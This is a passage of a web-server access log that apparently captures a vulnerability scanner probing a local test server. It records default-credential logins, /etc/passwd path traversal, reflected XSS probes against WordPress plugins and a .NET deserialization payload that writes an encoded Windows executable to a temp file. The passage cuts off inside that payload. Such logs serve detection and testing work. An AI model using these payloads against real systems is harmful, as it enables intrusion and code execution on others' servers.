"13/May/2022:16:34:41 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x22297MToth44gXTsnnU4ctzoqbVW4\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlU